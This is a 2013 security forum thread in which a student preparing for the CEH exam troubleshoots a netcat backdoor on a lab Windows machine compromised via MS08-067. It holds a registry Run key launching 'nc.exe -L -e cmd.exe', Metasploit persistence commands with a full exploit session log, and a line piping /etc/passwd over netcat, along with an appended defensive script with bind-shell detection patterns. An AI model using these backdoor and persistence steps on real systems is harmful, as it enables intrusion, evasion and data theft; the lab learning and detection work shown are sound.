Title: netcat question
Post by: Dalobo on January 27, 2013, 07:45:47 PM

I spent the last few hours in the lab figuring out how to upload, autorun, and clean up all evidence that I had ever had a backdoor on a Windows box. But I ran across a few things I could not figure out.

Steps:
Got a meterpreter shell on the victim
Uploaded nc.exe to the system32 folder
Set the regkey for running nc in listening mode at startup
Logged in as the admin on the victim machine
Rebooted the victim's server using the meterpreter reboot cmd
Waited for Windows to reboot
Logged in as admin on the victim server
Connected from BT using the nc IP port command

Questions:
1. When in meterpreter, why can I only reboot the remote victim's machine when someone is logged in on that machine?
2. Why can I only connect to netcat on the victim's machine when someone is logged in on that machine?

What am I doing wrong? Doing it this way just makes me more likely to get caught.

Thank you,
Dalobo

Title: Re: netcat question
Post by: Dark_Knight on January 27, 2013, 08:52:04 PM

Having established a meterpreter session, do you migrate to another process?

Title: Re: netcat question
Post by: Dalobo on January 28, 2013, 04:53:47 PM

No, I did not. I used MS08-067 to own the box. When I typed shell, and then whoami, I think I got administrator. That would make sense. I was not NT Authority.

I will have to try this again, but see about getting NT Authority. I will let you know once I have time to work on it again.

Thank you Dark_Knight.
Dalobo

Title: Re: netcat question
Post by: ajohnson on January 28, 2013, 05:41:23 PM

You should be SYSTEM with MS08-067, not administrator.

It would help if you post the exact registry key you added and the shutdown/restart command you're trying to use.

Title: Re: netcat question
Post by: Dalobo on January 28, 2013, 06:58:12 PM

OK. I redid this and I am nt authority, and the reboot command worked without having me log into the victim as admin.

I am still unable to connect using netcat. I set the following key using this command:

Code:
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\currentversion\\RUN -v BackDoor -d c:\\windows\\system32\\nc.exe" -L -d -p 1234 -e cmd.exe"
meterpreter > reboot

Once rebooted, I open a terminal and type:

Code:
nc 192.168.5.150 1234

I get connection refused. I will do some more testing and get back to you.

Thank you,
Dalobo

Title: Re: netcat question
Post by: superkojiman on January 28, 2013, 10:01:58 PM

Is the Windows firewall turned on? Can you check if netcat is running and listening on the port you specified after you rebooted?

Title: Re: netcat question
Post by: ajohnson on January 28, 2013, 10:24:53 PM

I believe all the "run" registry keys require a user to log in. The "run" under HKLM applies to all users, and the "run" under HKU will only apply to that specific user.

If you haven't played around with it yet, do a run persistence -h inside of a meterpreter session. The -S option will allow you to install a service that should run upon startup.

Title: Re: netcat question
Post by: Dalobo on February 02, 2013, 07:47:06 PM

I still can't get netcat to connect without a user being logged in.

I did give the persistence a try and can now have meterpreter call home whenever I lose the sessions. :) I used

Code:
run persistence -S -A -X -i 10 -p 445 -r 192.168.1.10

I am still lost on how an admin would use netcat to control a server. If he has to log into Windows to be able to make a connection to netcat... then he can control it that way... what is the point of netcat at that time?

Thank you,
Dalobo

Title: Re: netcat question
Post by: ajohnson on February 02, 2013, 08:12:21 PM

Maybe you can create a netcat service similar to what run persistence does using sc: http://technet.microsoft.com/en-us/library/cc990289(v=ws.10).aspx

There really isn't a practical reason for an admin to use netcat to legitimately administer a server. Remote desktop, psexec, PowerShell, etc. would be used in practice.

Title: Re: netcat question
Post by: Dalobo on February 03, 2013, 07:26:15 AM

Thanks. I thought netcat was a way for admins to administer their boxes without using RDP. While I understand that is kind of silly for them to do, I just thought that was the "legitimate" purpose of netcat. To be honest, as a pentester, I think I would rather have a meterpreter connection than a netcat connection.

I did have issues where the persistence shell did not call home after a few exits. I will have to play around with it some more. Will persistence still make a connection back to you when you reboot your attacking box? I would think so, but was unable to get it to work for me. I am doing all of this testing/learning for my CEH.

Thanks again for all the help,
Dalobo

Title: Re: netcat question
Post by: ajohnson on February 03, 2013, 12:47:55 PM

I'm sure there's been an admin or two that have tried, but it's really not a good solution. Hopefully they'd at least use socat or cryptcat and have it connect back to their system, not just bind so anyone on the network could access it ;)

There are a lot of legitimate uses for netcat. It's great to do basic network tests (i.e. did the firewall change get implemented correctly?):

Code:
# nc -vv google.com 80
Connection to google.com 80 port [tcp/http] succeeded!

I also use it for copying information over the network where I don't want to set up something like file sharing.

destination:
Code:
# nc -lp 9999 > goodies.txt

source:
Code:
# cat /etc/passwd | nc 192.168.1.99 9999

Be sure to familiarize yourself with the netcat cheat sheet: http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf The port relaying stuff is pretty cool too.

And yes, Meterpreter is preferred to netcat from a pen testing perspective, but it's not always feasible or possible. It's important to know how to get around with a basic shell on both *nix and Windows systems.

I'm not sure why you're not receiving a connection upon a reboot. It works for me:

Code:
msf > use exploit/windows/smb/ms08_067_netapi
rhost => 192.168.1.50
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.99:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.99:4444 -> 192.168.1.50:1031) at Sun Feb 03 10:49:22 -0700 2013
meterpreter > run persistence -A -S -X -i 5 -p 443 -r 192.168.1.99
[*] Creating a persistent agent: LHOST=192.168.1.99 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 609700 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\efdfhUSKx.vbs
[*] Agent executed with PID 1200
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB
[*] Creating service LendDpizgQ
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/XXXXXX-AEF856CC_20130203.5054/clean_up__20130203.5054.rc
meterpreter >
[*] Meterpreter session 2 opened (192.168.1.99:443 -> 192.168.1.50:1034) at Sun Feb 03 10:51:03 -0700 2013
Background session 1? [y/N]
msf exploit(ms08_067_netapi) > sessions

Active sessions
===============

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC  192.168.1.99:4444 -> 192.168.1.50:1031
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC  192.168.1.99:443 -> 192.168.1.50:1034

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > reboot
Rebooting...
meterpreter > exit
[*] Meterpreter session 2 closed. Reason: User exit
msf exploit(ms08_067_netapi) >
[*] Meterpreter session 3 opened (192.168.1.99:443 -> 192.168.1.50:1035) at Sun Feb 03 10:52:04 -0700 2013
msf exploit(ms08_067_netapi) > sessions -K
[*] Killing all sessions...
[*] Meterpreter session 1 closed.
[*] Meterpreter session 3 closed.
msf exploit(ms08_067_netapi) > jobs

Jobs
====

  Id  Name
  --  ----
  0   Exploit: multi/handler

msf exploit(ms08_067_netapi) >
[*] Meterpreter session 4 opened (192.168.1.99:443 -> 192.168.1.50:1025) at Sun Feb 03 10:52:44 -0700 2013

Make sure you have your listener (multi/handler) set up and waiting for the connection. run persistence will do this for you with -A, but you'll have to configure it manually if you don't use that. Check the output of netstat -anp tcp on your Windows host to start troubleshooting.

Way to actually get your hands dirty and not just memorize trivia for your CEH :)

Title: Re: netcat question
Post by: hayabusa on February 04, 2013, 07:11:40 AM

> Way to actually get your hands dirty and not just memorize trivia for your CEH :)

^^ +1
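The thread's explanation of why the Run key never fired without a logon while a service starts at boot, written up as a small autostart triage helper from the defender's side. This is an added example, not code from the thread or from Metasploit; the entry list, the service start-type encoding and the regex indicators are constructed assumptions, not real registry output.

```python
import re
from typing import NamedTuple


class Autostart(NamedTuple):
    location: str  # registry key holding the value, or "service:<start type>" (assumed encoding)
    name: str
    command: str


# Indicators taken from the thread: a netcat binary told to listen (-l/-L)
# and to hand a shell to whoever connects (-e cmd.exe).
NETCAT_BIN = re.compile(r"(^|[\\/\s])(nc|ncat|netcat)(\.exe)?(\s|$)", re.I)
LISTEN_FLAG = re.compile(r"(^|\s)-[lL]\w*")
SHELL_EXEC = re.compile(r"(^|\s)-e\s+\S*cmd(\.exe)?(\s|$)", re.I)


def trigger_of(entry: Autostart) -> str:
    """When the entry executes: Run keys only at a logon, auto-start services at boot."""
    loc = entry.location.lower()
    if loc.startswith("service:"):
        return "boot" if loc.endswith("auto") else "manual"
    if re.search(r"\\currentversion\\run(once)?$", loc):
        return "logon:any-user" if loc.startswith("hklm\\") else "logon:one-user"
    return "unknown"


def is_bind_shell(command: str) -> bool:
    """True when the command line looks like netcat listening with a shell attached."""
    return all(p.search(command) for p in (NETCAT_BIN, LISTEN_FLAG, SHELL_EXEC))


def audit(entries):
    """(name, trigger, flagged) per entry; flagged entries deserve a closer look."""
    return [(e.name, trigger_of(e), is_bind_shell(e.command)) for e in entries]


# Constructed sample entries (not real registry output).
SAMPLE = [
    Autostart(r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "BackDoor",
              r"c:\windows\system32\nc.exe -L -d -p 1234 -e cmd.exe"),
    Autostart(r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
              r"C:\Program Files\Example\updater.exe /background"),
    Autostart(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Sidebar",
              r"C:\Program Files\Windows Sidebar\sidebar.exe /autoRun"),
    Autostart("service:auto", "ncsvc", r"c:\windows\system32\nc.exe -L -p 1234 -e cmd.exe"),
]

if __name__ == "__main__":
    for name, trigger, flagged in audit(SAMPLE):
        print(("!! " if flagged else "   ") + f"{name:<10} runs at {trigger}")
```

Feed it the output of a real `reg query` / `sc qc` walk and the "runs at" column tells you which entries need a logged-on user and which survive a reboot on their own.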